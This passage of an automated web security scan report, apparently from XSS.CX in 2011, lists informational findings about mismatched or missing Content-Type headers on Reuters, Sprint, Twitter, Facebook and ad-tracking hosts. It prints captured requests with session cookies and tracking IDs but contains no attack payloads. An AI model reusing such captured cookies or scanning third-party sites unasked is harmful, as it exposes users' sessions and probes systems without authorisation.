Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; usatprod=R1449690983

Response

29.18. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://snas.nbcuni.com
Path:	/snas/api/getRemoteDomainCookies

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

29.19. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sprint.tt.omtrdc.net
Path:	/m2/sprint/mbox/standard

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/sprint/mbox/standard?mboxHost=www.sprint.com&mboxSession=1315097027971-178294&mboxPage=1315097027971-178294&screenHeight=1200&screenWidth=1920&browserWidth=1233&browserHeight=1037&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=sprint-interstitial-mbox&mboxId=0&mboxTime=1315079036636&mboxURL=http%3A%2F%2Fwww.sprint.com%2F&mboxReferrer=http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dsprint%26date%3D2011-9-3%26sa%3DX&mboxVersion=40 HTTP/1.1
Host: sprint.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

29.20. http://static.mcclatchyinteractive.com/creative/fns/widgets/images/deal_placeholder.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://static.mcclatchyinteractive.com
Path:	/creative/fns/widgets/images/deal_placeholder.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /creative/fns/widgets/images/deal_placeholder.jpg HTTP/1.1
Host: static.mcclatchyinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Last-Modified: Sun, 05 Dec 2010 16:53:13 GMT
ETag: "6fd7df-168e-4cfbc379"
Accept-Ranges: bytes
Content-Length: 5774
Content-Type: image/jpeg
Date: Sun, 04 Sep 2011 00:44:07 GMT
Connection: close

GIF89a..X....Y...Q.Ey.i..1m....-i..R..\..U.4o..Z..b.)f..P..T..N..J..^..V. ^..]..L.:r..X.=u.a..v..!a..Y.T..q..5p.%e..Y.%b..^..\.*h.&d..U.!`..Y.'f.3j..M.._.-j..V.!b..`..N.!d..V.-h..X.0l..Z..G}7q.*h..N..
...[SNIP]...

29.21. http://trc.taboolasyndication.com/reuters/trc/2/json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://trc.taboolasyndication.com
Path:	/reuters/trc/2/json

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /reuters/trc/2/json?tim=19%3A44%3A27.751&publisher=reuters&pv=2&list-size=3&list-id=rbox-t2v&id=353&uim=article&intent=s&uip=article&external=http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX&llvl=2&item-id=USTRE78222D20110903&item-type=text&item-url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903&page-id=6c870e4113048a2a02755a640f72c25ab23ac976&cv=4-8-2-1-48560-3339640&uiv=default&cb=TRC.callbacks.recommendations_1 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

29.22. http://urls.api.twitter.com/1/urls/count.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://urls.api.twitter.com
Path:	/1/urls/count.json

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /1/urls/count.json HTTP/1.1
Host: urls.api.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "6599c6d212c5eb6e41d800b7f8bf7397:1284511129"
Last-Modified: Wed, 15 Sep 2010 00:38:49 GMT
Accept-Ranges: bytes
Content-Length: 95
Content-Type: text/plain
Date: Sun, 04 Sep 2011 01:25:06 GMT
Connection: close
X-N: S

twttr.receiveCount({"errors":[{"code":48,"message":"Unable to access URL counting services"}]})

29.23. http://video.od.visiblemeasures.com/log previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://video.od.visiblemeasures.com
Path:	/log

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

29.24. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.214.45
X-Cnection: close
Date: Sun, 04 Sep 2011 00:44:20 GMT
Content-Length: 22

Invalid Application ID

29.25. http://www.nbcudigitaladops.com/hosted/util/getRemoteDomainCookies.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.nbcudigitaladops.com
Path:	/hosted/util/getRemoteDomainCookies.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 111
Content-Type: application/javascript
ETag: "15f491-44-4aacd3f4ef780"
Expires: Sun, 04 Sep 2011 00:52:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:52:40 GMT
Connection: close

__nbcadops_xasis.getRemoteDomainCookiesCallback("xa=n; pers_cookie_insert_nbc_blogs_80=2227425856.20480.0000");

29.26. http://www.reuters.com/assets/breakingNews previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.reuters.com
Path:	/assets/breakingNews

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /assets/breakingNews HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:42:36 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:42:26 GMT
Host: betaus.reuters.com
Age: 7
Vary: Accept-Encoding
Content-Length: 387
Content-Type: text/html;charset=UTF-8



<!--[if !IE]> Cached on Sun, 04 Sep 2011 00:42:28 GMT and will
...[SNIP]...

29.27. http://www.reuters.com/assets/info previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.reuters.com
Path:	/assets/info

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /assets/info HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:42:26 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:42:01 GMT
Age: 25
Vary: Accept-Encoding
Content-Length: 593
Content-Type: text/html;charset=UTF-8



<!--[if !IE]> Cached on Sun, 04 Sep 2011 00:42:01 GMT and will
...[SNIP]...

29.28. http://www.reuters.com/assets/searchIntercept previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.reuters.com
Path:	/assets/searchIntercept

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /assets/searchIntercept HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:29 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 01:21:58 GMT
Content-Length: 694
Age: 270
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8



<!--[if !IE]> Cached on Sun, 04 Sep 2011 01:21:58 GMT and will
...[SNIP]...

29.29. http://www.reuters.com/assets/sharedModuleLoader previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.reuters.com
Path:	/assets/sharedModuleLoader

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /assets/sharedModuleLoader HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:31 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 4 Sep 2011 01:26:32 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 213
Vary: Accept-Encoding
Connection: close



<!--[if !IE]> token: 5c2074b9-2f89-46a5-877e-a47d2dad08c6 <
...[SNIP]...

29.30. http://www.reuters.com/resources/r/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.reuters.com
Path:	/resources/r/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /resources/r/ HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:27:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.0
Vary: Accept-Encoding
Content-Length: 16
Connection: close
Content-Type: text/html

Illegal: d - msg

29.31. http://www.sprint.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.sprint.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.sprint.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=105E1B5AD68B10D605E2BDF5FE0A4306; TLTUID=105E1B5AD68B10D605E2BDF5FE0A4306; Apache=50.23.123.106.1315095358451950; TLisset=true; naf=userSeg~Interstitial Home Page; mbox=check#true#1315097088|session#1315097027971-178294#1315098888|disable#browser%20timeout#1315100658

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:46:44 GMT
Server: Apache/2.2.14 (Red Hat)
Last-Modified: Fri, 23 Apr 2010 11:54:19 GMT
ETag: "5e82c3-47e-484e6165730c0"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .........................................................................................................ttt.......................................................
...[SNIP]...

29.32. http://www.wunderground.com/auto/sacbeeXML/geo/WXCurrentObXML/index.xml previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wunderground.com
Path:	/auto/sacbeeXML/geo/WXCurrentObXML/index.xml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/xml

The response states that it contains XML. However, it actually appears to contain HTML.

Request

GET /auto/sacbeeXML/geo/WXCurrentObXML/index.xml HTTP/1.1
Host: www.wunderground.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:28:36 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
X-CreationTime: 0.052
Connection: close
Content-Type: text/xml
Content-Length: 3577

   <current_observation>
       <credit>Weather Underground NOAA Weather Station</credit>
       <credit_URL>http://wunderground.com/</credit_URL>
       <termsofservice link="http://www.wunderground.com/members/tos.a
...[SNIP]...

30. Content type is not specified previous
There are 2 instances of this issue:

http://load.tubemogul.com/core
http://pcm3.map.pulsemgr.com/uds/pc

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

30.1. http://load.tubemogul.com/core previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://load.tubemogul.com
Path:	/core

Request

GET /core HTTP/1.1
Host: load.tubemogul.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 401 Unauthorized
Server: Apache-Coyote/1.1
Date: Sun, 04 Sep 2011 01:22:49 GMT
Connection: close
Content-Length: 14

Not Authorized

30.2. http://pcm3.map.pulsemgr.com/uds/pc previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pcm3.map.pulsemgr.com
Path:	/uds/pc

Request

GET /uds/pc?ptnr=21280&sig=6f737abf3f6bb5f84a1ad1dc0be05ab8 HTTP/1.1
Host: pcm3.map.pulsemgr.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 43
Date: Sun, 04 Sep 2011 01:02:01 GMT
Connection: close

GIF89a.............!.......,...........D..;

Report generated by XSS.CX at Sat Sep 03 19:32:42 GMT-06:00 2011.